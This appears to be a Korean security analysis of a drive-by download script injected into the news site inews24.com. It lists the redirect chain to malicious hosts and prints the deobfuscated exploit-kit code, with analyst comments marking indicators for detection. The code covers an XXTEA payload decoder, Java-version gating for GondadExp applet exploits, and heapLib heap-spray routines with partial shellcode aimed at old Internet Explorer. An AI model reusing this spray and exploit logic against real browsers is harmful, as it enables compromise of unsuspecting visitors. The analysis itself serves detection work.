최초 감염 페이지 : http://inews24.cox/js_lib/slide_new.js
http://lzxvx.com/pix/rot.html
http://lzxvx.com/pix/ll.html
~>최종 파일 : http://oppo.ltevc.com/csx/8191i.css
~> <iframe src=nBQVd.html>
~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css
~> <iframe src=utEWY.html>
~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css
http://lzxvx.com/pix/swfobject.js
http://lzxvx.com/pix/jpg.js
// Obfuscation preamble of the injected script. The percent-encoded fragments are
// concatenated here and passed through unescape later in the file:
//   pkucde  -> "Yszz00xxooxx00" (becomes the decryption key Kxllz1z)
//   MxAAS   -> "document"
//   UAXzqa1 -> "write"
// AVgHbu2f is an alias for unescape, so the name "unescape" shows up only once.
// cu1l2lp3s2z holds the encoded payload; the post's author abridged it ([중략]),
// so it cannot be decoded from this listing as printed.
var Yszz1="%59"+"%73"+"%7A"+"%7A"+"%30"+"%30";var Yszz2="%78"+"%78"+"%6F"+"%6F"+"%78"+"%78";var Yszz3="%30"+"%30";var pkucde =Yszz1+Yszz2+Yszz3,AVgHbu2f=unescape,cu1l2lp3s2z="WdQOuGkE6OzRFoogdm06G5/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[중략]
/wBrtEEWSiNuj1SdT3xzOTTaM2Di0TPIiXdZ0BPFlDaSYWgxYFVmntCd1D8A9idlpJcQfWH1YK30ve
YjWcwRpgGapbfUUYx0KOdPU/5+Di4brvdJSlwemIjIe2kphz/91BznRNjmkjLLwtrxcJzmDT1NZSQtb
EGAZi3lK+u6YzEXBU9ORYn8kOK1S5uWZfGf7OHXmE6iNUVMYnSl/EVsNR1zVSgNqVcxzFDsMk
Aq6BY61q8tYX2sCfmc+hOOZ+TWM6rOBHvQ5KQBT+JKChWM0ehMxTK2kMNzCNFimMMuXRcw
euE+8Qib7AVU5S3dadoHXmTgMCGQNQxeLHqHY6/yUSShom1BNfHtDbOU3kvtsmejRQsqnRTjfv2
9L3lcWgbf1BupXZ3AUu0rn7Sil5NOavlnkP1acXwnhJZmpLPcPyc59p92nRB14cmtzyuQmy1tx0kZpM
gpQz3uf4IEBq2mouQl7LdEIlTJIngCkkxKkw2zoDx5ri0UxhHj6KqOSHO+lP59zry40nfG3WnO+cpJGGj
xczB4DNgvSG9NCKO9EnYY4fT8Fhc9rfY6DM26vldSdPJY5eOnVNTjIRrijSlbDSgLS9OBTt5A==",MxAAS="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",UAXzqa1="%77"+"%72"+"%69"+"%74"+"%65",Kxllz1z;
// Yszz_v1(str): treats each char code of `str` as one UTF-8 byte and rebuilds the text.
// The high nibble (c>>4) selects the sequence length: 0-7 is a single byte, 12-13 a
// two-byte sequence, 14 a three-byte sequence. Any other lead value is dropped without
// an error, and continuation bytes are not validated.
function Yszz_v1(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
// Lookup table read by kaixindecode, indexed by (char code & 0xff); entries of -1 mark
// characters that the decoder skips. The table is abridged in this listing ([중략]).
var kaixindecodeChars=new Array(-1,-1,-1,-1,-1,-1,[중략],1,-1);
// AVgHbu2f is the alias for unescape set up earlier; MxAAS becomes the string "document".
MxAAS=AVgHbu2f(MxAAS);
// kaixindecode(str): table-driven decoder with the shape of a Base64 decode.
// It reads up to four symbols per group and maps each through kaixindecodeChars, skipping
// symbols that map to -1. Each complete group is packed into three output characters.
// A '=' (char code 61) in the third or fourth position returns the output built so far;
// running out of input mid-group breaks out of the loop and returns the same way.
// Returns the decoded data as a string with one character per byte.
function kaixindecode(str)
{var c1,c2,c3,c4;/*Yszz 0.3*/var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=kaixindecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=kaixindecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=kaixindecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=kaixindecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
/**
 * Unpacks an array of 32-bit words into a byte string, least significant byte first.
 * The array is overwritten in place: each element becomes its 4-character string.
 *
 * @param {number[]} v - words to unpack (mutated).
 * @param {*} w - when truthy, the last word (read before unpacking) is used as the
 *   length at which the joined string is cut.
 * @returns {string} the joined bytes, truncated when `w` is truthy.
 */
function long2str(v, w) {
  var wordCount = v.length;
  // Must be read before the loop replaces the numbers with strings.
  var declaredLength = v[wordCount - 1] & 0xffffffff;
  var index = 0;
  while (index < wordCount) {
    var word = v[index];
    v[index] = String.fromCharCode(
      word & 0xff,
      (word >>> 8) & 0xff,
      (word >>> 16) & 0xff,
      (word >>> 24) & 0xff
    );
    index += 1;
  }
  var joined = v.join('');
  return w ? joined.substring(0, declaredLength) : joined;
}
/**
 * Packs a byte string into 32-bit words, four characters per word with the first
 * character in the low byte. Positions past the end of the string contribute 0.
 *
 * @param {string} s - input string, one character per byte.
 * @param {*} w - when truthy, the original string length is appended as a final word.
 * @returns {number[]} the packed words as signed 32-bit integers.
 */
function str2long(s, w) {
  var byteCount = s.length;
  var words = [];
  for (var offset = 0; offset < byteCount; offset += 4) {
    var b0 = s.charCodeAt(offset);
    var b1 = s.charCodeAt(offset + 1) << 8;
    var b2 = s.charCodeAt(offset + 2) << 16;
    var b3 = s.charCodeAt(offset + 3) << 24;
    words.push(b0 | b1 | b2 | b3);
  }
  if (w) {
    words.push(byteCount);
  }
  return words;
}
// Decryption key: unescape of the percent-encoded pkucde, i.e. "Yszz00xxooxx00".
Kxllz1z=AVgHbu2f(pkucde);
// kaixin(str, Udkz): decrypts the byte string `str` with the key string `Udkz`.
// Returns "" for empty input. Both arguments are packed into 32-bit words with
// str2long(..., false). The round count q = floor(6 + 52/(n+1)), the constant 0x9E3779B9
// and the mixing expression match the XXTEA (Corrected Block TEA) decryption routine.
// The result is unpacked with long2str(v, true), so the last decrypted word is used as
// the plaintext length.
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
// UAXzqa1 becomes the string "write".
UAXzqa1=AVgHbu2f(UAXzqa1);
Dz=cu1l2lp3s2z;
// Decode chain: kaixindecode (table decode) -> kaixin (decrypt with Kxllz1z) -> Yszz_v1 (UTF-8).
// The result is written into the page through window["document"]["write"](Dz). Because the
// sink is reached by bracket lookups on unescaped strings, the literal "document.write"
// never appears in this file. Signatures are better keyed on the decoder chain or on
// runtime behaviour than on that literal.
Dz=Yszz_v1(kaixin(kaixindecode(Dz), Kxllz1z));window[MxAAS][UAXzqa1] (Dz);
// Landing-page logic: profiles the visitor and selects which content to load.
// It relies on deployJava and deconcept.SWFObjectUtil, which are not defined in this listing
// (the chain at the top of the post lists swfobject.js among the fetched files).
var RWkTTC8=navigator.userAgent.toLowerCase();
// Gate: runs only when the "Udz1szV" cookie is absent and the user agent contains none of
// "bot", "spider" or "linux". Crawlers and repeat visitors therefore see nothing further.
if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && RWkTTC8.indexOf("spider")==-1 && RWkTTC8.indexOf("linux")==-1)
{
// jHiJb2 is not read again in the visible code.
var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();
// Marker cookie "Udz1szV=Yes" with a 24-hour expiry and path "/": a visitor is processed
// at most once per day. The cookie name is a host-side indicator.
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();
var kaixiny=document.createElement('body');
document.body.appendChild(kaixiny);
// Installed Java version(s) as a string with '.' and '_' removed, then parsed as an integer
// (constructed example: "1.6.0_27" -> 16027). parseInt is called without a radix and
// stops at the first non-digit; a non-numeric result is NaN and fails the <= test below.
var kaixinm=deployJava.getJREs()+"";
kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));
if (kaixinm<=17002)
{
// Java branch: a 1x1 <applet> element is created; archive, class and attributes are set below.
var kaixin=document.createElement('applet');
kaixin.width="1";
kaixin.height="1";
// Version values 16000-16027 or 15000-15031.
if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))
{
// The applet archive carries a .jpg extension. The "data" attribute holds the URL that the
// chain at the top of the post lists as the final file.
kaixin.archive="WHXgJTUj.jpg";
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("data","http://oppo.ltevc.com/csx/8191i.css");
document.body.appendChild(kaixin);
}
// Version values 17000-17002 or 16000-16030. 16000-16027 is already taken by the branch above,
// so only 16028-16030 reaches here. NOTE(review): the third range (>=15033 && <=15000)
// cannot be true as written.
else if ((kaixinm<=17002 && kaixinm>=17000) || (kaixinm<=16030 && kaixinm>=16000) ||(kaixinm>=15033 && kaixinm<=15000))
{
// Second archive/class pair. The URL attribute is named "xiaomaolv" and its path is
// /css/8191i.css, not /csx/ as in the first branch; record both paths when building IoC lists.
kaixin.archive="pvAjohpE.jpg";
kaixin.code="GondadExp.Ohno.class";
kaixin.setAttribute("xiaomaolv","http://oppo.ltevc.com/css/8191i.css");
kaixin.setAttribute("bn","woyouyizhixiaomaolv");
kaixin.setAttribute("si","conglaiyebuqi");
kaixin.setAttribute("bs","748");
document.body.appendChild(kaixin);
}
}
else {
// Non-Java branch: chooses an iframe from the Flash Player version and the browser string.
var pcss=navigator.userAgent.toLowerCase();
var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
// Same getPlayerVersion() call as above, with the property names split into string fragments.
var kxkx=deconcept["SWFOb"+"jectU"+"til"]["getPlay"+"erVer"+"sion"]();
// Flash major 10 with minor <= 3 and rev <= 183; or major 11 with minor <= 1 and rev <= 102,
// where the user agent contains "msie 6.0" or "msie 7.0", or does not contain "msie" at all.
if(((kxkx['major']==10&&kxkx['minor']<=3)&&kxkx['rev']<=183||(kxkx['major']==11&&kxkx['minor']<=1&&kxkx['rev']<=102&&((pcss.indexOf('msie 6.0')>0)||(pcss.indexOf('msie 7.0')>0)||(pcss.indexOf('msie')==-1)))))
{
document.writeln("<iframe src=nBQVd.html><\/iframe>");
}
// Otherwise, Internet Explorer 6.0 / 7.0 user agents get utEWY.html.
else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{
document.writeln("<iframe src=utEWY.html><\/iframe>");
}
else
{
// Same test as the else-if above, which has already failed here; as written, N9TtW.html
// is never requested by this script.
if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{
document.writeln("<iframe src=N9TtW.html><\/iframe>");
}
}
}
}
<iframe src=utEWY.html>
<script>
// Empty function used only as a namespace object; the heapLib.ie members are attached to it.
// NOTE(review): the names and structure match the publicly documented "heapLib" JavaScript
// heap-manipulation library. Its presence in a page is a strong indicator of a browser
// memory-corruption exploit attempt.
function heapLib() {
}
// Constructor. maxAlloc defaults to 65535 and heapBase to 0x150000 when the argument is falsy.
// paddingStr starts as "AAAA" and is doubled while 4 + length*2 + 2 stays below maxAlloc.
// mem starts as an empty array. flushOleaut32 is called last; it is not shown in this listing.
heapLib.ie = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.paddingStr = "AA"+"AA";
while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
this.paddingStr += this.paddingStr;
}
this.mem = new Array();
this.flushOleaut32();
}
// Calls Math.atan2 with the marker value 0xbabe and the message, then discards the result.
// It has no effect on the page; presumably a hook for a debugger breakpoint (verify).
heapLib.ie.prototype.debug = function(msg) {
void(Math.atan2(0xbabe, msg));
}
// Calls Math.atan (enable == true) or Math.asin (otherwise) with the marker 0xbabe and
// discards the result. It has no effect on the page; presumably debugger hooks (verify).
heapLib.ie.prototype.debugHeap = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
void(Math.asin(0xbabe));
}
// Calls Math.acos with the marker 0xbabe and discards the result; msg is not used.
heapLib.ie.prototype.debugBreak = function(msg) {
void(Math.acos(0xbabe));
}
// Returns the first `len` characters of paddingStr.
// Throws a string (not an Error object) when `len` exceeds the prepared padding length.
heapLib.ie.prototype.padding = function(len) {
if (len > this.paddingStr.length)
throw "Requested padding string length " + len + ", only " + this.paddingStr.length + " available";
return this.paddingStr.substr(0, len);
}
// Rounds `num` up to a multiple of `round`; throws a string when `round` is 0.
// parseInt is applied to a number here, i.e. it is used to truncate the quotient.
heapLib.ie.prototype.round = function(num, round) {
if (round == 0)
throw "Round argument cannot be 0";
return parseInt((num + (round-1)) / round) * round;
}
heapLib.ie.prototype.hex = function(num, width)
{
var digits = "0123456789ABCDEF";
var hex = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
hex = digits.substr(num & 0xF, 1) + hex;
}
var width = (width ? width : 0);
while (hex.le...%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA
%u1441%u108A%uFA7A%u2[중략]%uBDBD%uBDBD"+"%uEAEA%uEAEA
%uEAEA%uEAEA");
// Heap-spray stage of utEWY.html. `code` and `heap_obj` are defined in the part of the page
// that the listing cuts off above.
// Filler built from the repeated value 0x0c0c, doubled until it is at least 0x80000 characters.
// Long runs of "%u0c0c" passed to unescape are a common static indicator of this technique.
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x80000) nops += nops;
// The payload is placed between filler slices and the result is doubled to at least 0x40000.
var offset = nops.substring(0, 0x800 - code.length);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
// The same block is passed to heap_obj.alloc on every iteration. A page making thousands of
// identical large string allocations is the behavioural signature to look for.
for (var i=1; i < 0xa70; i++)
{
heap_obj.alloc(block);
}
<iframe src=nBQVd.html>
// Spray stage of nBQVd.html. cWiDmn8, csbcST4 and VHbfXE5 are defined outside this excerpt.
// The long string uses "oxzz" as a placeholder that is replaced with csbcST4 before being
// passed to VHbfXE5. Presumably csbcST4 is "%u" and VHbfXE5 is unescape; confirm against
// the full sample. The string itself is abridged ([중략]).
// The placeholder tokens "oxzz" and "vglQ6" are usable as static signature strings.
var rcho6 =cWiDmn8+'oxzz5858oxzz5858oxzz10EBoxzz4B5BoxzzC933oxzzB966oxzz03B8
oxzz3480oxzzBD0BoxzzFAE2oxzz05EBoxzzEBE8oxzzFFFFoxzz54FFoxzzBEA3oxzzBDBD
oxzzD9E2oxzz8D1Cox[중략]oxzzEAEA';
var NyzohAW2="d";
var APgm7 = VHbfXE5(rcho6.replace(/oxzz/g,csbcST4));
var kAtq4 = new Array()
var SPur3 = 0x100000 - (APgm7.length*2 + 0x24 + 0x1000);
// After the replacement this is csbcST4 + "0d0d" repeated twice, i.e. the filler pattern.
var rbSO2 = "vglQ60d0"+"dvglQ60d0"+"d";
var mWXJ4 = VHbfXE5(rbSO2.replace(/vglQ6/g,csbcST4));
// a, b and c are not declared in this excerpt, so in a real browser the call throws and the
// catch block runs. This is likely an anti-emulation check: an analysis environment that
// tolerates the call never executes the spray.
try{alert(a,b,c);}
catch(e)
{
var Vbfgj1="d";
while(mWXJ4.length < SPur3) mWXJ4 +=mWXJ4;
var iRre8 = mWXJ4.substring(0, SPur3/2);
// `delete` on a var-declared name does not remove it.
delete mWXJ4;
// 300 strings, each the filler slice followed by the decoded payload, are kept alive in kAtq4.
for(i=0;i<300;i++)
{
kAtq4[i] = [iRre8+APgm7].join("");
}
}
// Writes an <embed> for KR3ZE.swf (width 10, height 0, so it is not visible) into the page.
// The caller is not visible in this excerpt. The SWF file name is a network indicator for
// the nBQVd.html branch.
function LFydVC8()
{
document.write("<embed src='KR3ZE.swf' width=10 height=0></embed>");
}
// NyzohAW2 changes from "d" to "h"; its consumer is not visible in this excerpt.
NyzohAW2="h";
// Invokes the click handler of the element with id "WFGGY8" without user interaction.
// Neither the element nor its handler is shown in this excerpt.
document.getElementById("WFGGY8").onclick();
inews24.com 삽입 스크립트 : inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 !